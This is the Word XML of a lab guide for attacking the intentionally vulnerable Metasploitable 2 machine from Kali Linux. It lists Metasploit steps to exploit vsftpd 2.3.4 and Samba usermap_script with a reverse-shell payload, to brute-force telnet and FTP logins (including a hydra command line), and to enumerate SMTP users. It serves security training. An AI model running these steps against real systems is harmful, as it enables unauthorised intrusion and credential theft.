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FACD0" w14:textId="7D753286" w:rsidR="006C192B" w:rsidRDefault="00C61142" w:rsidP="00C61142">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D5547">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SCANNING AND ENUMERATION USING</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C61142">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NMAP</w:t>
      </w:r>
      <w:r w:rsidR="003D5547">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318CB322" w14:textId="4A22DCAA" w:rsidR="003D5547" w:rsidRDefault="003D5547" w:rsidP="00C61142">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>METASPOITABLE MACHINE 2 AND KALI LINUX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B872F1B" w14:textId="77777777" w:rsidR="00C61142" w:rsidRDefault="00C61142"/>
    <w:p w14:paraId="31CC9F8F" w14:textId="5F2B398A" w:rsidR="00C61142" w:rsidRDefault="00C61142">
      <w:r>
        <w:t>We’ll be showing steps on how to</w:t>
      </w:r>
      <w:r w:rsidR="00ED0A30">
        <w:t xml:space="preserve"> exploit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> these networks protocol using their port versions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F82B36D" w14:textId="59E169C8" w:rsidR="00C61142" w:rsidRDefault="00C61142" w:rsidP="00C61142">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t>State</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6871A2" w14:textId="257B9D22" w:rsidR="00C61142" w:rsidRDefault="00C61142" w:rsidP="00C61142">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>ftp</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00ED0A30">
        <w:t>vsftpd 2.3.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C600C3F" w14:textId="7AF62F35" w:rsidR="00ED0A30" w:rsidRDefault="00ED0A30" w:rsidP="00ED0A30">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>telnet</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Linux telnetd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0BC601" w14:textId="6C744DDD" w:rsidR="00ED0A30" w:rsidRDefault="00ED0A30" w:rsidP="00C61142">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>smtp</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>postfix smtp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AEE0330" w14:textId="0EDF3586" w:rsidR="00ED0A30" w:rsidRDefault="00ED0A30" w:rsidP="00C61142">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Hydra </w:t>
      </w:r>
      <w:r>
        <w:t>as an exploitation tool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CAB3C1C" w14:textId="51C4558D" w:rsidR="00ED0A30" w:rsidRDefault="00ED0A30" w:rsidP="00ED0A30">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Netbios-ssn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56977A29" w14:textId="77777777" w:rsidR="000B679F" w:rsidRDefault="000B679F" w:rsidP="000B679F"/>
    <w:p w14:paraId="04ACBB95" w14:textId="77777777" w:rsidR="000B679F" w:rsidRDefault="000B679F" w:rsidP="000B679F"/>
    <w:p w14:paraId="58B9D00C" w14:textId="7A3A8F95" w:rsidR="000B679F" w:rsidRDefault="000B679F" w:rsidP="003D5547">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>ftp – vsftpd 2.3.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16FB9FB1" w14:textId="1BCBB0A9" w:rsidR="003D5547" w:rsidRDefault="003D5547" w:rsidP="003D5547">
      <w:r>
        <w:t>File transfer protocol</w:t>
      </w:r>
      <w:r w:rsidR="00E66319">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E66319" w:rsidRPr="00E66319">
        <w:t>(FTP) is a standard network protocol used for transferring files between a client and a server on a TCP/IP-based network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59DD98F4" w14:textId="09F627C5" w:rsidR="003D5547" w:rsidRDefault="00D52375" w:rsidP="003D5547">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>O</w:t>
      </w:r>
      <w:r w:rsidR="003D5547">
        <w:t>pen</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a terminal on </w:t>
      </w:r>
      <w:r w:rsidR="00E66319">
        <w:t>K</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ali </w:t>
      </w:r>
      <w:r w:rsidR="00E66319">
        <w:t>Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3712C1D6" w14:textId="2A0836F2" w:rsidR="00D52375" w:rsidRDefault="00D52375" w:rsidP="003D5547">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Put in the ‘msfconsole’ command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201B72BD" w14:textId="675ADAC1" w:rsidR="00D52375" w:rsidRDefault="00D52375" w:rsidP="003D5547">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Search vsftpd 2.3.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0DE45B" w14:textId="2712EC97" w:rsidR="00D52375" w:rsidRDefault="00D52375" w:rsidP="003D5547">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Use the command ‘use 0’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704D553D" w14:textId="2F68631E" w:rsidR="00D52375" w:rsidRDefault="00D52375" w:rsidP="003D5547">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27BB980E" w14:textId="6E8084AE" w:rsidR="00D52375" w:rsidRDefault="00D52375" w:rsidP="003D5547">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Set RHOSTS “IP ADDRESS”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CBCF587" w14:textId="4B87ED41" w:rsidR="00D52375" w:rsidRDefault="006E13D9" w:rsidP="003D5547">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="00D52375">
        <w:t>xploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6958404F" w14:textId="429ED8D3" w:rsidR="00D52375" w:rsidRDefault="00D52375" w:rsidP="003D5547">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Hostname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68DD6017" w14:textId="6E52F7F2" w:rsidR="00D52375" w:rsidRDefault="00D52375" w:rsidP="003D5547">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Ifconfig (for confirmation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751DAD2D" w14:textId="77777777" w:rsidR="00D52375" w:rsidRDefault="00D52375" w:rsidP="00D52375"/>
    <w:p w14:paraId="038329A6" w14:textId="77777777" w:rsidR="00D52375" w:rsidRDefault="00D52375" w:rsidP="00D52375"/>
    <w:p w14:paraId="3A116042" w14:textId="77777777" w:rsidR="00D52375" w:rsidRDefault="00D52375" w:rsidP="00D52375"/>
    <w:p w14:paraId="5F8DDAC0" w14:textId="77777777" w:rsidR="00D52375" w:rsidRDefault="00D52375" w:rsidP="00D52375"/>
    <w:p w14:paraId="0E1FD4AB" w14:textId="77777777" w:rsidR="00D52375" w:rsidRDefault="00D52375" w:rsidP="00D52375"/>
    <w:p w14:paraId="6AAF9C94" w14:textId="77777777" w:rsidR="00D52375" w:rsidRDefault="00D52375" w:rsidP="00D52375"/>
    <w:p w14:paraId="1A6A7527" w14:textId="77777777" w:rsidR="00D52375" w:rsidRDefault="00D52375" w:rsidP="00D52375"/>
    <w:p w14:paraId="540A75A3" w14:textId="2541FD13" w:rsidR="00D52375" w:rsidRDefault="00E66319" w:rsidP="00E66319">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>telnet – Linux telnetd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1AD74E" w14:textId="059D20E2" w:rsidR="00E66319" w:rsidRDefault="00E66319" w:rsidP="00E66319">
      <w:r w:rsidRPr="00E66319">
        <w:t>Telnet is a network protocol that allows users to remotely access and control another computer over the internet or a local area network (LAN) using a text-based command-line interface</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243212FC" w14:textId="32240548" w:rsidR="00E66319" w:rsidRDefault="00E66319" w:rsidP="00E66319">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Open a terminal on Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747E4E3A" w14:textId="77777777" w:rsidR="00E66319" w:rsidRDefault="00E66319" w:rsidP="00E66319">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Put in the ‘msfconsole’ command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227ED425" w14:textId="1A9A38B8" w:rsidR="00E66319" w:rsidRDefault="00E66319" w:rsidP="00E66319">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Use the command “telnet 23”  23 is the port number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2A17D1" w14:textId="30493DB2" w:rsidR="00E66319" w:rsidRDefault="00E66319" w:rsidP="00E66319">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Use 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D088BD" w14:textId="44F748BC" w:rsidR="00E66319" w:rsidRDefault="00E66319" w:rsidP="00E66319">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F325A9D" w14:textId="146C4A5B" w:rsidR="00E66319" w:rsidRDefault="00E66319" w:rsidP="00E66319">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Set RHOSTS “iP address”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3981648D" w14:textId="15C3FBAB" w:rsidR="0035297A" w:rsidRDefault="0035297A" w:rsidP="0035297A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Set STOP_ON_SUCCESS TRUE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C796CC" w14:textId="29BAF61E" w:rsidR="0035297A" w:rsidRDefault="0035297A" w:rsidP="0035297A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Set USERPASS_FILE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551B0E6E" w14:textId="13A78F14" w:rsidR="0035297A" w:rsidRDefault="0035297A" w:rsidP="0035297A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FB7173" w14:textId="3050FF58" w:rsidR="0035297A" w:rsidRDefault="006E13D9" w:rsidP="0035297A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="0035297A">
        <w:t>xploit ( must be successful )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D55A41E" w14:textId="77777777" w:rsidR="0035297A" w:rsidRDefault="0035297A" w:rsidP="0035297A"/>
    <w:p w14:paraId="2E71591F" w14:textId="46862FB0" w:rsidR="0035297A" w:rsidRDefault="0035297A" w:rsidP="0035297A">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Smtp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A16D52D" w14:textId="5EAE44BF" w:rsidR="0035297A" w:rsidRDefault="0035297A" w:rsidP="0035297A">
      <w:r w:rsidRPr="0035297A">
        <w:t>SMTP, or Simple Mail Transfer Protocol, is the fundamental protocol that allows email to be sent and received over the internet, acting as the "postal service" for emails, ensuring they are routed and delivered between servers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9347C0" w14:textId="77777777" w:rsidR="0035297A" w:rsidRDefault="0035297A" w:rsidP="0035297A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Open a terminal on Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FAA7322" w14:textId="5FFEC1FD" w:rsidR="0035297A" w:rsidRDefault="0035297A" w:rsidP="0035297A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Put in the ‘msfconsole’ command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4AD835" w14:textId="58BAF4A6" w:rsidR="00515EC0" w:rsidRDefault="00515EC0" w:rsidP="0035297A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Use the command “ service postgresql start”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0889A3" w14:textId="1C9D5822" w:rsidR="0035297A" w:rsidRDefault="0035297A" w:rsidP="0035297A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Search smtp_enum</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5743F6" w14:textId="01964D3D" w:rsidR="0035297A" w:rsidRDefault="0035297A" w:rsidP="0035297A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Use 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5863F430" w14:textId="12661F9B" w:rsidR="0035297A" w:rsidRDefault="0035297A" w:rsidP="0035297A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441E44B3" w14:textId="54D50FC0" w:rsidR="0035297A" w:rsidRDefault="0035297A" w:rsidP="0035297A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Set RHOSTS “iP address”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B8FFB0" w14:textId="3B7AA716" w:rsidR="0035297A" w:rsidRDefault="006E13D9" w:rsidP="0035297A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="0035297A">
        <w:t xml:space="preserve">xploit </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59180760" w14:textId="33BBCEE5" w:rsidR="0035297A" w:rsidRDefault="0035297A" w:rsidP="0035297A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Use Netcad</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6BAC20" w14:textId="2C043A25" w:rsidR="0035297A" w:rsidRDefault="0035297A" w:rsidP="0035297A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">nc </w:t>
      </w:r>
      <w:r w:rsidR="00515EC0">
        <w:t>192………..</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3B8A1A" w14:textId="77777777" w:rsidR="00515EC0" w:rsidRDefault="00515EC0" w:rsidP="00515EC0"/>
    <w:p w14:paraId="6F8E819B" w14:textId="77777777" w:rsidR="00515EC0" w:rsidRDefault="00515EC0" w:rsidP="00515EC0"/>
    <w:p w14:paraId="5FB5D469" w14:textId="77777777" w:rsidR="00515EC0" w:rsidRDefault="00515EC0" w:rsidP="00515EC0"/>
    <w:p w14:paraId="45DF9D58" w14:textId="77777777" w:rsidR="00515EC0" w:rsidRDefault="00515EC0" w:rsidP="00515EC0"/>
    <w:p w14:paraId="65CBD3E1" w14:textId="76352A93" w:rsidR="00515EC0" w:rsidRDefault="00515EC0" w:rsidP="00515EC0">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Using Hydra as an exploitation tool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643CAC53" w14:textId="5C94AAD9" w:rsidR="00515EC0" w:rsidRDefault="00515EC0" w:rsidP="00515EC0">
      <w:r>
        <w:t>To exploit ftp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F63CBC" w14:textId="38F19CD9" w:rsidR="00515EC0" w:rsidRDefault="00515EC0" w:rsidP="00515EC0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>create a file username.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312A5203" w14:textId="1142A2F2" w:rsidR="00515EC0" w:rsidRDefault="00515EC0" w:rsidP="00515EC0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>nano the file with possible usernames</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60381B71" w14:textId="5F75FEB2" w:rsidR="00515EC0" w:rsidRDefault="00515EC0" w:rsidP="00515EC0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>create a file password.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B280B9" w14:textId="27DA6B76" w:rsidR="00515EC0" w:rsidRDefault="00515EC0" w:rsidP="00515EC0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>nano the file with possible passwords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52273795" w14:textId="614CAF84" w:rsidR="00515EC0" w:rsidRDefault="00515EC0" w:rsidP="00515EC0">
      <w:r>
        <w:t>hydra -L /home/kali/Downloads/username.txt -P /home/kali/Downloads/password.txt (ip address) ftp -V</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D43045" w14:textId="77777777" w:rsidR="00515EC0" w:rsidRDefault="00515EC0" w:rsidP="00515EC0"/>
    <w:p w14:paraId="0B313586" w14:textId="7CF9044B" w:rsidR="004B542E" w:rsidRDefault="004B542E" w:rsidP="004B542E">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Netbios-ssn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427069B2" w14:textId="2AAD0313" w:rsidR="004B542E" w:rsidRDefault="004B542E" w:rsidP="004B542E">
      <w:r>
        <w:t xml:space="preserve">Samba is an </w:t>
      </w:r>
      <w:r w:rsidR="006E13D9">
        <w:t>open-source</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> project that is widely used on linux and unix computers so they can work with window file and print services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752C1004" w14:textId="075F93EE" w:rsidR="006E13D9" w:rsidRDefault="006E13D9" w:rsidP="004B542E">
      <w:r>
        <w:t>We can use samba as an active server to handle login, authentication and access control for a windows network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED31641" w14:textId="77777777" w:rsidR="006E13D9" w:rsidRDefault="006E13D9" w:rsidP="006E13D9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Open a terminal on Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516BDB34" w14:textId="4D04AF41" w:rsidR="006E13D9" w:rsidRDefault="006E13D9" w:rsidP="004B542E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Put in the ‘msfconsole’ command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1695C9" w14:textId="27B6029A" w:rsidR="006E13D9" w:rsidRDefault="006E13D9" w:rsidP="004B542E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Search exploit samba</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5793DE05" w14:textId="4B23ECC4" w:rsidR="006E13D9" w:rsidRDefault="006E13D9" w:rsidP="004B542E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Use exploit/multi/samba/usermap_script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576AEBBC" w14:textId="698E6F5E" w:rsidR="006E13D9" w:rsidRDefault="006E13D9" w:rsidP="004B542E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505711E3" w14:textId="634713B3" w:rsidR="006E13D9" w:rsidRDefault="006E13D9" w:rsidP="004B542E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Set RHOSTS ip address (victim’s machine)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D1FEDF" w14:textId="27495324" w:rsidR="006E13D9" w:rsidRDefault="006E13D9" w:rsidP="004B542E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Set the payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B70D5FB" w14:textId="03C257DD" w:rsidR="006E13D9" w:rsidRDefault="006E13D9" w:rsidP="004B542E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Show payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDFEF70" w14:textId="5F0BCFEB" w:rsidR="006E13D9" w:rsidRDefault="006E13D9" w:rsidP="004B542E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Use payload cmd/unix/reverse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2EDA80" w14:textId="7F9CD0AD" w:rsidR="006E13D9" w:rsidRDefault="006E13D9" w:rsidP="004B542E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Set required argument for payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CAD98D" w14:textId="3989FFB5" w:rsidR="006E13D9" w:rsidRDefault="006E13D9" w:rsidP="004B542E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Show options</w:t>
      </w:r>
    </w:p>
